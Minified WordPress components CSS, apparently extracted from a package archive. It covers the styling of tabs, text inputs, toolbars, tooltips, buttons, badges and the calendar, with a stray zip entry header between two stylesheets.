flex-direction:row; } .components-tab-panel__tabs[aria-orientation=vertical]{ flex-direction:column; } .components-tab-panel__tabs-item{ background:#0000; border:none; border-radius:0; box-shadow:none; cursor:pointer; font-weight:500; height:48px !important; margin-right:0; padding:3px 16px; position:relative; } .components-tab-panel__tabs-item:focus:not(:disabled){ box-shadow:none; outline:none; position:relative; } .components-tab-panel__tabs-item:after{ background:var(--wp-components-color-accent, var(--wp-admin-theme-color, #3858e9)); border-radius:0; bottom:0; content:""; height:calc(var(--wp-admin-border-width-focus)*0); left:0; pointer-events:none; position:absolute; right:0; } @media not (prefers-reduced-motion){ .components-tab-panel__tabs-item:after{ transition:all .1s linear; } } .components-tab-panel__tabs-item.is-active:after{ height:calc(var(--wp-admin-border-width-focus)*1); outline:2px solid #0000; outline-offset:-1px; } .components-tab-panel__tabs-item:before{ border-radius:2px; bottom:12px; box-shadow:0 0 0 0 #0000; content:""; left:12px; pointer-events:none; position:absolute; right:12px; top:12px; } @media not (prefers-reduced-motion){ .components-tab-panel__tabs-item:before{ transition:all .1s linear; } } .components-tab-panel__tabs-item:focus-visible:before{ box-shadow:0 0 0 var(--wp-admin-border-width-focus) var(--wp-components-color-accent, var(--wp-admin-theme-color, #3858e9)); outline:2px solid #0000; } .components-tab-panel__tab-content:focus{ box-shadow:none; outline:none; } .components-tab-panel__tab-content:focus-visible{ box-shadow:0 0 0 var(--wp-admin-border-width-focus) var(--wp-components-color-accent, var(--wp-admin-theme-color, #3858e9)); outline:2px solid #0000; outline-offset:0; } .components-text-control__input,.components-text-control__input[type=color],.components-text-control__input[type=date],.components-text-control__input[type=datetime-local],.components-text-control__input[type=datetime],.components-text-control__input[type=email],.components-text-control__input[type=month],.components-text-control__input[type=number],.components-text-control__input[type=password],.components-text-control__input[type=tel],.components-text-control__input[type=text],.components-text-control__input[type=time],.components-text-control__input[type=url],.components-text-control__input[type=week]{ background:var(--wp-components-color-background, #fff); border:1px solid #949494; border-radius:2px; box-shadow:0 0 0 #0000; color:var(--wp-components-color-foreground, #1e1e1e); font-family:-apple-system,BlinkMacSystemFont,Segoe UI,Roboto,Oxygen-Sans,Ubuntu,Cantarell,Helvetica Neue,sans-serif; font-size:16px; height:32px; line-height:normal; margin:0; padding:6px 8px; width:100%; } @media not (prefers-reduced-motion){ .components-text-control__input,.components-text-control__input[type=color],.components-text-control__input[type=date],.components-text-control__input[type=datetime-local],.components-text-control__input[type=datetime],.components-text-control__input[type=email],.components-text-control__input[type=month],.components-text-control__input[type=number],.components-text-control__input[type=password],.components-text-control__input[type=tel],.components-text-control__input[type=text],.components-text-control__input[type=time],.components-text-control__input[type=url],.components-text-control__input[type=week]{ transition:box-shadow .1s linear; } } @media (min-width:600px){ .components-text-control__input,.components-text-control__input[type=color],.components-text-control__input[type=date],.components-text-control__input[type=datetime-local],.components-text-control__input[type=datetime],.components-text-control__input[type=email],.components-text-control__input[type=month],.components-text-control__input[type=number],.components-text-control__input[type=password],.components-text-control__input[type=tel],.components-text-control__input[type=text],.components-text-control__input[type=time],.components-text-control__input[type=url],.components-text-control__input[type=week]{ font-size:13px; line-height:normal; } } .components-text-control__input:focus,.components-text-control__input[type=color]:focus,.components-text-control__input[type=date]:focus,.components-text-control__input[type=datetime-local]:focus,.components-text-control__input[type=datetime]:focus,.components-text-control__input[type=email]:focus,.components-text-control__input[type=month]:focus,.components-text-control__input[type=number]:focus,.components-text-control__input[type=password]:focus,.components-text-control__input[type=tel]:focus,.components-text-control__input[type=text]:focus,.components-text-control__input[type=time]:focus,.components-text-control__input[type=url]:focus,.components-text-control__input[type=week]:focus{ border-color:var(--wp-components-color-accent, var(--wp-admin-theme-color, #3858e9)); box-shadow:0 0 0 .5px var(--wp-components-color-accent, var(--wp-admin-theme-color, #3858e9)); outline:2px solid #0000; } .components-text-control__input::-webkit-input-placeholder,.components-text-control__input[type=color]::-webkit-input-placeholder,.components-text-control__input[type=date]::-webkit-input-placeholder,.components-text-control__input[type=datetime-local]::-webkit-input-placeholder,.components-text-control__input[type=datetime]::-webkit-input-placeholder,.components-text-control__input[type=email]::-webkit-input-placeholder,.components-text-control__input[type=month]::-webkit-input-placeholder,.components-text-control__input[type=number]::-webkit-input-placeholder,.components-text-control__input[type=password]::-webkit-input-placeholder,.components-text-control__input[type=tel]::-webkit-input-placeholder,.components-text-control__input[type=text]::-webkit-input-placeholder,.components-text-control__input[type=time]::-webkit-input-placeholder,.components-text-control__input[type=url]::-webkit-input-placeholder,.components-text-control__input[type=week]::-webkit-input-placeholder{ color:#1e1e1e9e; } .components-text-control__input::-moz-placeholder,.components-text-control__input[type=color]::-moz-placeholder,.components-text-control__input[type=date]::-moz-placeholder,.components-text-control__input[type=datetime-local]::-moz-placeholder,.components-text-control__input[type=datetime]::-moz-placeholder,.components-text-control__input[type=email]::-moz-placeholder,.components-text-control__input[type=month]::-moz-placeholder,.components-text-control__input[type=number]::-moz-placeholder,.components-text-control__input[type=password]::-moz-placeholder,.components-text-control__input[type=tel]::-moz-placeholder,.components-text-control__input[type=text]::-moz-placeholder,.components-text-control__input[type=time]::-moz-placeholder,.components-text-control__input[type=url]::-moz-placeholder,.components-text-control__input[type=week]::-moz-placeholder{ color:#1e1e1e9e; } .components-text-control__input:-ms-input-placeholder,.components-text-control__input[type=color]:-ms-input-placeholder,.components-text-control__input[type=date]:-ms-input-placeholder,.components-text-control__input[type=datetime-local]:-ms-input-placeholder,.components-text-control__input[type=datetime]:-ms-input-placeholder,.components-text-control__input[type=email]:-ms-input-placeholder,.components-text-control__input[type=month]:-ms-input-placeholder,.components-text-control__input[type=number]:-ms-input-placeholder,.components-text-control__input[type=password]:-ms-input-placeholder,.components-text-control__input[type=tel]:-ms-input-placeholder,.components-text-control__input[type=text]:-ms-input-placeholder,.components-text-control__input[type=time]:-ms-input-placeholder,.components-text-control__input[type=url]:-ms-input-placeholder,.components-text-control__input[type=week]:-ms-input-placeholder{ color:#1e1e1e9e; } .components-text-control__input,.components-text-control__input[type=color],.components-text-control__input[type=date],.components-text-control__input[type=datetime-local],.components-text-control__input[type=datetime],.components-text-control__input[type=email],.components-text-control__input[type=month],.components-text-control__input[type=number],.components-text-control__input[type=password],.components-text-control__input[type=tel],.components-text-control__input[type=text],.components-text-control__input[type=time],.components-text-control__input[type=url],.components-text-control__input[type=week]{ border-color:var(--wp-components-color-gray-600, #949494); } .components-text-control__input::placeholder,.components-text-control__input[type=color]::placeholder,.components-text-control__input[type=date]::placeholder,.components-text-control__input[type=datetime-local]::placeholder,.components-text-control__input[type=datetime]::placeholder,.components-text-control__input[type=email]::placeholder,.components-text-control__input[type=month]::placeholder,.components-text-control__input[type=number]::placeholder,.components-text-control__input[type=password]::placeholder,.components-text-control__input[type=tel]::placeholder,.components-text-control__input[type=text]::placeholder,.components-text-control__input[type=time]::placeholder,.components-text-control__input[type=url]::placeholder,.components-text-control__input[type=week]::placeholder{ color:color-mix(in srgb, var(--wp-components-color-foreground, #1e1e1e), #0000 38%); } .components-text-control__input.is-next-40px-default-size,.components-text-control__input[type=color].is-next-40px-default-size,.components-text-control__input[type=date].is-next-40px-default-size,.components-text-control__input[type=datetime-local].is-next-40px-default-size,.components-text-control__input[type=datetime].is-next-40px-default-size,.components-text-control__input[type=email].is-next-40px-default-size,.components-text-control__input[type=month].is-next-40px-default-size,.components-text-control__input[type=number].is-next-40px-default-size,.components-text-control__input[type=password].is-next-40px-default-size,.components-text-control__input[type=tel].is-next-40px-default-size,.components-text-control__input[type=text].is-next-40px-default-size,.components-text-control__input[type=time].is-next-40px-default-size,.components-text-control__input[type=url].is-next-40px-default-size,.components-text-control__input[type=week].is-next-40px-default-size{ height:40px; padding-left:12px; padding-right:12px; } .components-text-control__input[type=email],.components-text-control__input[type=url]{ direction:ltr; } .components-tip{ color:#757575; display:flex; } .components-tip svg{ align-self:center; fill:#f0b849; flex-shrink:0; margin-left:16px; } .components-tip p{ margin:0; } .components-toggle-control__label{ line-height:16px; } .components-toggle-control__label:not(.is-disabled){ cursor:pointer; } .components-toggle-control__help{ display:inline-block; margin-inline-start:40px; } .components-accessible-toolbar{ border:1px solid var(--wp-components-color-foreground, #1e1e1e); border-radius:2px; display:inline-flex; flex-shrink:0; } .components-accessible-toolbar>.components-toolbar-group:last-child{ border-left:none; } .components-accessible-toolbar.is-unstyled{ border:none; } .components-accessible-toolbar.is-unstyled>.components-toolbar-group{ border-left:none; } .components-accessible-toolbar[aria-orientation=vertical],.components-toolbar[aria-orientation=vertical]{ align-items:center; display:flex; flex-direction:column; } .components-accessible-toolbar .components-button,.components-toolbar .components-button{ height:48px; padding-left:16px; padding-right:16px; position:relative; z-index:1; } .components-accessible-toolbar .components-button:focus:not(:disabled),.components-toolbar .components-button:focus:not(:disabled){ box-shadow:none; outline:none; } .components-accessible-toolbar .components-button:before,.components-toolbar .components-button:before{ border-radius:2px; content:""; display:block; height:32px; left:8px; position:absolute; right:8px; z-index:-1; } @media not (prefers-reduced-motion){ .components-accessible-toolbar .components-button:before,.components-toolbar .components-button:before{ animation:components-button__appear-animation .1s ease; animation-fill-mode:forwards; } } .components-accessible-toolbar .components-button svg,.components-toolbar .components-button svg{ margin-left:auto; margin-right:auto; position:relative; } .components-accessible-toolbar .components-button.is-pressed,.components-accessible-toolbar .components-button.is-pressed:hover,.components-toolbar .components-button.is-pressed,.components-toolbar .components-button.is-pressed:hover{ background:#0000; } .components-accessible-toolbar .components-button.is-pressed:before,.components-toolbar .components-button.is-pressed:before{ background:var(--wp-components-color-foreground, #1e1e1e); } .components-accessible-toolbar .components-button:focus:before,.components-toolbar .components-button:focus:before{ box-shadow:inset 0 0 0 1px #fff, 0 0 0 var(--wp-admin-border-width-focus) var(--wp-admin-theme-color); outline:2px solid #0000; } .components-accessible-toolbar .components-button.has-icon.has-icon,.components-toolbar .components-button.has-icon.has-icon{ min-width:48px; padding-left:8px; padding-right:8px; } @keyframes components-button__appear-animation{ 0%{ transform:scaleY(0); } to{ transform:scaleY(1); } } .components-toolbar__control.components-button{ position:relative; } .components-toolbar__control.components-button[data-subscript] svg{ padding:5px 0 5px 10px; } .components-toolbar__control.components-button[data-subscript]:after{ bottom:10px; content:attr(data-subscript); font-family:-apple-system,BlinkMacSystemFont,Segoe UI,Roboto,Oxygen-Sans,Ubuntu,Cantarell,Helvetica Neue,sans-serif; font-size:13px; font-weight:600; left:8px; line-height:12px; position:absolute; } .components-toolbar__control.components-button:not(:disabled).is-pressed[data-subscript]:after{ color:#fff; } .components-toolbar-group{ background-color:var(--wp-components-color-background, #fff); border-left:1px solid var(--wp-components-color-foreground, #1e1e1e); display:inline-flex; flex-shrink:0; flex-wrap:wrap; min-height:48px; padding-left:6px; padding-right:6px; } .components-toolbar-group .components-toolbar-group.components-toolbar-group{ border-width:0; margin:0; } .components-toolbar-group{ line-height:0; } .components-toolbar-group .components-button.components-button,.components-toolbar-group .components-button.has-icon.has-icon{ justify-content:center; min-width:36px; padding-left:6px; padding-right:6px; } .components-toolbar-group .components-button.components-button svg,.components-toolbar-group .components-button.has-icon.has-icon svg{ min-width:24px; } .components-toolbar-group .components-button.components-button:before,.components-toolbar-group .components-button.has-icon.has-icon:before{ left:2px; right:2px; } .components-toolbar{ background-color:var(--wp-components-color-background, #fff); border:1px solid var(--wp-components-color-foreground, #1e1e1e); display:inline-flex; flex-shrink:0; flex-wrap:wrap; margin:0; min-height:48px; } .components-toolbar .components-toolbar.components-toolbar{ border-width:0; margin:0; } div.components-toolbar>div{ display:flex; margin:0; } div.components-toolbar>div+div.has-left-divider{ margin-right:6px; overflow:visible; position:relative; } div.components-toolbar>div+div.has-left-divider:before{ background-color:#ddd; box-sizing:initial; content:""; display:inline-block; height:20px; position:absolute; right:-3px; top:8px; width:1px; } .components-tooltip{ background:#000; border-radius:2px; box-shadow:0 1px 2px #0000000d,0 2px 3px #0000000a,0 6px 6px #00000008,0 8px 8px #00000005; color:#f0f0f0; font-family:-apple-system,BlinkMacSystemFont,Segoe UI,Roboto,Oxygen-Sans,Ubuntu,Cantarell,Helvetica Neue,sans-serif; font-size:12px; line-height:1.4; padding:4px 8px; text-align:center; z-index:1000002; } .components-tooltip__shortcut{ margin-right:8px; } .components-validated-control:has(:is(input,select):user-invalid) .components-input-control__backdrop{ --wp-components-color-accent:#cc1818; border-color:#cc1818; } .components-validated-control :is(textarea,input[type=text]):user-invalid{ --wp-admin-theme-color:#cc1818; --wp-components-color-accent:#cc1818; border-color:#cc1818; } .components-validated-control .components-combobox-control__suggestions-container:has(input:user-invalid):not(:has([aria-expanded=true])){ border-color:#cc1818; } .components-validated-control__wrapper-with-error-delegate{ position:relative; } .components-validated-control__wrapper-with-error-delegate:has(select:user-invalid) .components-input-control__backdrop{ --wp-components-color-accent:#cc1818; border-color:#cc1818; } .components-validated-control__wrapper-with-error-delegate:has(input[type=radio]:invalid){ --wp-components-color-accent:#cc1818; } .components-validated-control__wrapper-with-error-delegate:has(input:user-invalid) .components-form-token-field__input-container:not(:has([aria-expanded=true])){ --wp-components-color-accent:#cc1818; border-color:#cc1818; } .components-validated-control__error-delegate{ height:100%; opacity:0; pointer-events:none; position:absolute; top:0; width:100%; } .components-validated-control__indicator{ align-items:flex-start; animation:components-validated-control__indicator-jump .2s cubic-bezier(.68, -.55, .27, 1.55); color:var(--wp-components-color-gray-700, #757575); display:flex; font-family:-apple-system,"system-ui",Segoe UI,Roboto,Oxygen-Sans,Ubuntu,Cantarell,Helvetica Neue,sans-serif; font-size:.75rem; gap:4px; line-height:16px; margin:8px 0 0; } .components-validated-control__indicator.is-invalid{ color:#cc1818; } .components-validated-control__indicator.is-valid{ color:color-mix(in srgb, #000 30%, #4ab866); } .components-validated-control__indicator-icon{ flex-shrink:0; } .components-validated-control__indicator-spinner{ height:12px; margin:2px; width:12px; } @keyframes components-validated-control__indicator-jump{ 0%{ opacity:0; transform:translateY(-4px); } to{ opacity:1; transform:translateY(0); } } :root{ --wp-admin-theme-color:#3858e9; --wp-admin-theme-color--rgb:56, 88, 233; --wp-admin-theme-color-darker-10:#2145e6; --wp-admin-theme-color-darker-10--rgb:33.0384615385, 68.7307692308, 230.4615384615; --wp-admin-theme-color-darker-20:#183ad6; --wp-admin-theme-color-darker-20--rgb:23.6923076923, 58.1538461538, 214.3076923077; --wp-admin-border-width-focus:2px; } @media (min-resolution:192dpi){ :root{ --wp-admin-border-width-focus:1.5px; } }PK!ل'dist/components/style.cssnuȯ@charset "UTF-8"; @media not (prefers-reduced-motion){ .components-animate__appear{ animation:components-animate__appear-animation .1s cubic-bezier(0, 0, .2, 1) 0s; animation-fill-mode:forwards; } } .components-animate__appear.is-from-top,.components-animate__appear.is-from-top.is-from-left{ transform-origin:top left; } .components-animate__appear.is-from-top.is-from-right{ transform-origin:top right; } .components-animate__appear.is-from-bottom,.components-animate__appear.is-from-bottom.is-from-left{ transform-origin:bottom left; } .components-animate__appear.is-from-bottom.is-from-right{ transform-origin:bottom right; } @keyframes components-animate__appear-animation{ 0%{ transform:translateY(-2em) scaleY(0) scaleX(0); } to{ transform:translateY(0) scaleY(1) scaleX(1); } } @media not (prefers-reduced-motion){ .components-animate__slide-in{ animation:components-animate__slide-in-animation .1s cubic-bezier(0, 0, .2, 1); animation-fill-mode:forwards; } .components-animate__slide-in.is-from-left{ transform:translateX(100%); } .components-animate__slide-in.is-from-right{ transform:translateX(-100%); } } @keyframes components-animate__slide-in-animation{ to{ transform:translateX(0); } } @media not (prefers-reduced-motion){ .components-animate__loading{ animation:components-animate__loading 1.6s ease-in-out infinite; } } @keyframes components-animate__loading{ 0%{ opacity:.5; } 50%{ opacity:1; } to{ opacity:.5; } } .components-autocomplete__popover .components-popover__content{ min-width:200px; padding:8px; } .components-autocomplete__result.components-button{ display:flex; height:auto; min-height:36px; text-align:left; width:100%; } .components-autocomplete__result.components-button:focus:not(:disabled){ box-shadow:inset 0 0 0 1px #fff, 0 0 0 var(--wp-admin-border-width-focus) var(--wp-admin-theme-color); outline:2px solid #0000; } .components-badge{ box-sizing:border-box; } .components-badge *,.components-badge :after,.components-badge :before{ box-sizing:inherit; } .components-badge{ background-color:color-mix(in srgb, #fff 90%, var(--base-color)); border-radius:2px; color:color-mix(in srgb, #000 50%, var(--base-color)); display:inline-block; line-height:0; max-width:100%; min-height:24px; padding:2px 8px; } .components-badge:where(.is-default){ background-color:#f0f0f0; color:#2f2f2f; } .components-badge.has-icon{ padding-inline-start:4px; } .components-badge.is-info{ --base-color:#3858e9; } .components-badge.is-warning{ --base-color:#f0b849; } .components-badge.is-error{ --base-color:#cc1818; } .components-badge.is-success{ --base-color:#4ab866; } .components-badge__flex-wrapper{ align-items:center; display:inline-flex; font-size:12px; font-weight:400; gap:2px; line-height:20px; max-width:100%; } .components-badge__icon{ flex-shrink:0; } .components-badge__content{ overflow:hidden; text-overflow:ellipsis; white-space:nowrap; } .components-button-group{ display:inline-block; } .components-button-group .components-button{ border-radius:0; box-shadow:inset 0 0 0 1px #1e1e1e; color:#1e1e1e; display:inline-flex; } .components-button-group .components-button+.components-button{ margin-left:-1px; } .components-button-group .components-button:first-child{ border-radius:2px 0 0 2px; } .components-button-group .components-button:last-child{ border-radius:0 2px 2px 0; } .components-button-group .components-button.is-primary,.components-button-group .components-button:focus{ position:relative; z-index:1; } .components-button-group .components-button.is-primary{ box-shadow:inset 0 0 0 1px #1e1e1e; } .components-button{ -webkit-appearance:none; background:none; border:0; cursor:pointer; display:inline-flex; font-family:inherit; font-size:13px; margin:0; text-decoration:none; } @media not (prefers-reduced-motion){ .components-button{ transition:box-shadow .1s linear; } } .components-button{ align-items:center; border-radius:2px; box-sizing:border-box; color:var(--wp-components-color-foreground, #1e1e1e); height:36px; padding:6px 12px; } .components-button.is-next-40px-default-size{ height:40px; } .components-button:hover:not(:disabled,[aria-disabled=true]),.components-button[aria-expanded=true]{ color:var(--wp-components-color-accent, var(--wp-admin-theme-color, #3858e9)); } .components-button:focus:not(:disabled){ box-shadow:0 0 0 var(--wp-admin-border-width-focus) var(--wp-components-color-accent, var(--wp-admin-theme-color, #3858e9)); outline:3px solid #0000; } .components-button.is-primary{ background:var(--wp-components-color-accent, var(--wp-admin-theme-color, #3858e9)); color:var(--wp-components-color-accent-inverted, #fff); outline:1px solid #0000; text-decoration:none; text-shadow:none; white-space:nowrap; } .components-button.is-primary:hover:not(:disabled){ background:var(--wp-components-color-accent-darker-10, var(--wp-admin-theme-color-darker-10, #2145e6)); color:var(--wp-components-color-accent-inverted, #fff); } .components-button.is-primary:active:not(:disabled){ background:var(--wp-components-color-accent-darker-20, var(--wp-admin-theme-color-darker-20, #183ad6)); border-color:var(--wp-components-color-accent-darker-20, var(--wp-admin-theme-color-darker-20, #183ad6)); color:var(--wp-components-color-accent-inverted, #fff); } .components-button.is-primary:focus:not(:disabled){ box-shadow:inset 0 0 0 1px var(--wp-components-color-background, #fff), 0 0 0 var(--wp-admin-border-width-focus) var(--wp-components-color-accent, var(--wp-admin-theme-color, #3858e9)); } .components-button.is-primary:disabled,.components-button.is-primary:disabled:active:enabled,.components-button.is-primary[aria-disabled=true],.components-button.is-primary[aria-disabled=true]:active:enabled,.components-button.is-primary[aria-disabled=true]:enabled{ background:var(--wp-components-color-accent, var(--wp-admin-theme-color, #3858e9)); border-color:var(--wp-components-color-accent, var(--wp-admin-theme-color, #3858e9)); color:#fff6; outline:none; } .components-button.is-primary:disabled:active:enabled:focus:enabled,.components-button.is-primary:disabled:focus:enabled,.components-button.is-primary[aria-disabled=true]:active:enabled:focus:enabled,.components-button.is-primary[aria-disabled=true]:enabled:focus:enabled,.components-button.is-primary[aria-disabled=true]:focus:enabled{ box-shadow:inset 0 0 0 1px var(--wp-components-color-background, #fff), 0 0 0 var(--wp-admin-border-width-focus) var(--wp-components-color-accent, var(--wp-admin-theme-color, #3858e9)); } .components-button.is-primary.is-busy,.components-button.is-primary.is-busy:disabled,.components-button.is-primary.is-busy[aria-disabled=true]{ background-image:linear-gradient(-45deg, var(--wp-components-color-accent, var(--wp-admin-theme-color, #3858e9)) 33%, var(--wp-components-color-accent-darker-20, var(--wp-admin-theme-color-darker-20, #183ad6)) 33%, var(--wp-components-color-accent-darker-20, var(--wp-admin-theme-color-darker-20, #183ad6)) 70%, var(--wp-components-color-accent, var(--wp-admin-theme-color, #3858e9)) 70%); background-size:100px 100%; border-color:var(--wp-components-color-accent, var(--wp-admin-theme-color, #3858e9)); color:var(--wp-components-color-accent-inverted, #fff); } .components-button.is-secondary,.components-button.is-tertiary{ outline:1px solid #0000; } .components-button.is-secondary:active:not(:disabled),.components-button.is-tertiary:active:not(:disabled){ box-shadow:none; } .components-button.is-secondary:disabled,.components-button.is-secondary[aria-disabled=true],.components-button.is-secondary[aria-disabled=true]:hover,.components-button.is-tertiary:disabled,.components-button.is-tertiary[aria-disabled=true],.components-button.is-tertiary[aria-disabled=true]:hover{ background:#0000; color:#949494; transform:none; } .components-button.is-secondary{ background:#0000; box-shadow:inset 0 0 0 1px var(--wp-components-color-accent, var(--wp-admin-theme-color, #3858e9)), 0 0 0 currentColor; color:var(--wp-components-color-accent, var(--wp-admin-theme-color, #3858e9)); outline:1px solid #0000; white-space:nowrap; } .components-button.is-secondary:hover:not(:disabled,[aria-disabled=true],.is-pressed){ background:color-mix(in srgb, var(--wp-components-color-accent, var(--wp-admin-theme-color, #3858e9)) 4%, #0000); box-shadow:inset 0 0 0 1px var(--wp-components-color-accent-darker-20, var(--wp-admin-theme-color-darker-20, #183ad6)); color:var(--wp-components-color-accent-darker-20, var(--wp-admin-theme-color-darker-20, #183ad6)); } .components-button.is-secondary:disabled:not(:focus),.components-button.is-secondary[aria-disabled=true]:hover:not(:focus),.components-button.is-secondary[aria-disabled=true]:not(:focus){ box-shadow:inset 0 0 0 1px #ddd; } .components-button.is-secondary:focus:not(:disabled){ box-shadow:0 0 0 currentColor inset, 0 0 0 var(--wp-admin-border-width-focus) var(--wp-components-color-accent, var(--wp-admin-theme-color, #3858e9)); } .components-button.is-tertiary{ background:#0000; color:var(--wp-components-color-accent, var(--wp-admin-theme-color, #3858e9)); white-space:nowrap; } .components-button.is-tertiary:hover:not(:disabled,[aria-disabled=true],.is-pressed){ background:color-mix(in srgb, var(--wp-components-color-accent, var(--wp-admin-theme-color, #3858e9)) 4%, #0000); color:var(--wp-components-color-accent-darker-20, var(--wp-admin-theme-color-darker-20, #183ad6)); } .components-button.is-tertiary:active:not(:disabled,[aria-disabled=true]){ background:color-mix(in srgb, var(--wp-components-color-accent, var(--wp-admin-theme-color, #3858e9)) 8%, #0000); } p+.components-button.is-tertiary{ margin-left:-6px; } .components-button.is-tertiary:disabled:not(:focus),.components-button.is-tertiary[aria-disabled=true]:hover:not(:focus),.components-button.is-tertiary[aria-disabled=true]:not(:focus){ box-shadow:none; outline:none; } .components-button.is-destructive{ --wp-components-color-accent:#cc1818; --wp-components-color-accent-darker-10:#9e1313; --wp-components-color-accent-darker-20:#710d0d; } .components-button.is-destructive:not(.is-primary):not(.is-secondary):not(.is-tertiary):not(.is-link){ color:#cc1818; } .components-button.is-destructive:not(.is-primary):not(.is-secondary):not(.is-tertiary):not(.is-link):hover:not(:disabled,[aria-disabled=true]){ color:#710d0d; } .components-button.is-destructive:not(.is-primary):not(.is-secondary):not(.is-tertiary):not(.is-link):focus{ box-shadow:0 0 0 var(--wp-admin-border-width-focus) #cc1818; } .components-button.is-destructive:not(.is-primary):not(.is-secondary):not(.is-tertiary):not(.is-link):active:not(:disabled,[aria-disabled=true]){ background:#ccc; } .components-button.is-destructive:not(.is-primary):not(.is-secondary):not(.is-tertiary):not(.is-link):disabled,.components-button.is-destructive:not(.is-primary):not(.is-secondary):not(.is-tertiary):not(.is-link)[aria-disabled=true]{ color:#949494; } .components-button.is-destructive.is-secondary:hover:not(:disabled,[aria-disabled=true]),.components-button.is-destructive.is-tertiary:hover:not(:disabled,[aria-disabled=true]){ background:#cc18180a; } .components-button.is-destructive.is-secondary:active:not(:disabled,[aria-disabled=true]),.components-button.is-destructive.is-tertiary:active:not(:disabled,[aria-disabled=true]){ background:#cc181814; } .components-button.is-link{ background:none; border:0; border-radius:0; box-shadow:none; color:var(--wp-components-color-accent, var(--wp-admin-theme-color, #3858e9)); margin:0; outline:none; padding:0; text-align:left; text-decoration:underline; } @media not (prefers-reduced-motion){ .components-button.is-link{ transition-duration:.05s; transition-property:border, background, color; transition-timing-function:ease-in-out; } } .components-button.is-link{ height:auto; } .components-button.is-link:focus{ border-radius:2px; } .components-button.is-link:disabled,.components-button.is-link[aria-disabled=true]{ color:#949494; } .components-button:not(:disabled,[aria-disabled=true]):active{ color:var(--wp-components-color-foreground, #1e1e1e); } .components-button:disabled,.components-button[aria-disabled=true]{ color:#949494; cursor:default; } @media not (prefers-reduced-motion){ .components-button.is-busy,.components-button.is-secondary.is-busy,.components-button.is-secondary.is-busy:disabled,.components-button.is-secondary.is-busy[aria-disabled=true]{ animation:components-button__busy-animation 2.5s linear infinite; } } .components-button.is-busy,.components-button.is-secondary.is-busy,.components-button.is-secondary.is-busy:disabled,.components-button.is-secondary.is-busy[aria-disabled=true]{ background-image:linear-gradient(-45deg, #fafafa 33%, #e0e0e0 0, #e0e0e0 70%, #fafafa 0); background-size:100px 100%; } .components-button.is-compact{ height:32px; } .components-button.is-compact.has-icon:not(.has-text){ min-width:32px; padding:0; } .components-button.is-small{ font-size:11px; height:24px; line-height:22px; padding:0 8px; } .components-button.is-small.has-icon:not(.has-text){ min-width:24px; padding:0; } .components-button.has-icon{ justify-content:center; min-width:36px; padding:6px; } .components-button.has-icon.is-next-40px-default-size{ min-width:40px; } .components-button.has-icon .dashicon{ align-items:center; box-sizing:initial; display:inline-flex; justify-content:center; padding:2px; } .components-button.has-icon.has-text{ gap:4px; justify-content:start; padding-left:8px; padding-right:12px; } .components-button.has-icon.has-text.has-icon-right{ padding-left:12px; padding-right:8px; } .components-button.is-pressed,.components-button.is-pressed:hover{ color:var(--wp-components-color-foreground-inverted, #fff); } .components-button.is-pressed:hover:not(:disabled,[aria-disabled=true]),.components-button.is-pressed:not(:disabled,[aria-disabled=true]){ background:var(--wp-components-color-foreground, #1e1e1e); } .components-button.is-pressed:disabled,.components-button.is-pressed[aria-disabled=true]{ color:#949494; } .components-button.is-pressed:disabled:not(.is-primary):not(.is-secondary):not(.is-tertiary),.components-button.is-pressed[aria-disabled=true]:not(.is-primary):not(.is-secondary):not(.is-tertiary){ background:#949494; color:var(--wp-components-color-foreground-inverted, #fff); } .components-button.is-pressed:focus:not(:disabled){ box-shadow:inset 0 0 0 1px var(--wp-components-color-background, #fff), 0 0 0 var(--wp-admin-border-width-focus) var(--wp-components-color-accent, var(--wp-admin-theme-color, #3858e9)); outline:2px solid #0000; } .components-button svg{ fill:currentColor; outline:none; } @media (forced-colors:active){ .components-button svg{ fill:CanvasText; } } .components-button .components-visually-hidden{ height:auto; } @keyframes components-button__busy-animation{ 0%{ background-position:200px 0; } } .components-calendar{ background-color:var(--wp-components-color-background, #fff); color:var(--wp-components-color-foreground, #1e1e1e); display:inline-block; font-size:13px; font-weight:400; position:relative; z-index:0; } .components-calendar,.components-calendar *,.components-calendar :after,.components-calendar :before{ box-sizing:border-box; } .components-calendar__day{ padding:0; position:relative; } .components-calendar__day:has(.components-calendar__day-button:disabled){ color:var(--wp-components-color-gray-600, #949494); } .components-calendar__day:has(.components-calendar__day-button:focus-visible),.components-calendar__day:has(.components-calendar__day-button:hover:not(:disabled)){ color:var(--wp-components-color-accent, var(--wp-admin-theme-color, #3858e9)); } .components-calendar__day-button{ align-items:center; background:none; border:none; border-radius:2px; color:inherit; cursor:pointer; display:flex; font:inherit; font-variant-numeric:tabular-nums; height:32px; justify-content:center; margin:0; padding:0; position:relative; width:32px; } .components-calendar__day-button:before{ border:none; border-radius:2px; content:""; inset:0; position:absolute; z-index:-1; } .components-calendar__day-button:after{ content:""; inset:0; pointer-events:none; position:absolute; z-index:1; } .components-calendar__day-button:disabled{ cursor:revert; } @media (forced-colors:active){ .components-calendar__day-button:disabled{ text-decoration:line-through; } } .components-calendar__day-button:focus-visible{ outline:var(--wp-admin-border-width-focus) solid var(--wp-components-color-accent, var(--wp-admin-theme-color, #3858e9)); outline-offset:1px; } .components-calendar__caption-label{ align-items:center; border:0; display:inline-flex; position:relative; text-transform:capitalize; white-space:nowrap; z-index:1; } .components-calendar__button-next,.components-calendar__button-previous{ align-items:center; -moz-appearance:none; -webkit-appearance:none; appearance:none; background:none; border:none; border-radius:2px; color:inherit; cursor:pointer; display:inline-flex; height:32px; justify-content:center; margin:0; padding:0; position:relative; width:32px; } .components-calendar__button-next:disabled,.components-calendar__button-next[aria-disabled=true],.components-calendar__button-previous:disabled,.components-calendar__button-previous[aria-disabled=true]{ color:var(--wp-components-color-gray-600, #949494); cursor:revert; } .components-calendar__button-next:focus-visible,.components-calendar__button-previous:focus-visible{ outline:var(--wp-admin-border-width-focus) solid var(--wp-components-color-accent, var(--wp-admin-theme-color, #3858e9)); } .components-calendar__chevron{ display:inline-block; fill:currentColor; height:16px; width:16px; } .components-calendar[dir=rtl] .components-calendar__nav .components-calendar__chevron{ transform:rotate(180deg); transform-origin:50%; } .components-calendar__month-caption{ align-content:center; display:flex; height:32px; justify-content:center; margin-bottom:12px; } .components-calendar__months{ display:flex; flex-wrap:wrap; gap:16px; justify-content:center; max-width:fit-content; position:relative; } .components-calendar__month-grid{ border-collapse:initial; border-spacing:0 4px; } .components-calendar__nav{ align-items:center; display:flex; height:32px; inset-block-start:0; inset-inline-end:0; inset-inline-start:0; justify-content:space-between; position:absolute; } .components-calendar__weekday{ color:var(--wp-components-color-gray-700, #757575); height:32px; padding:0; text-align:center; text-transform:uppercase; width:32px; } 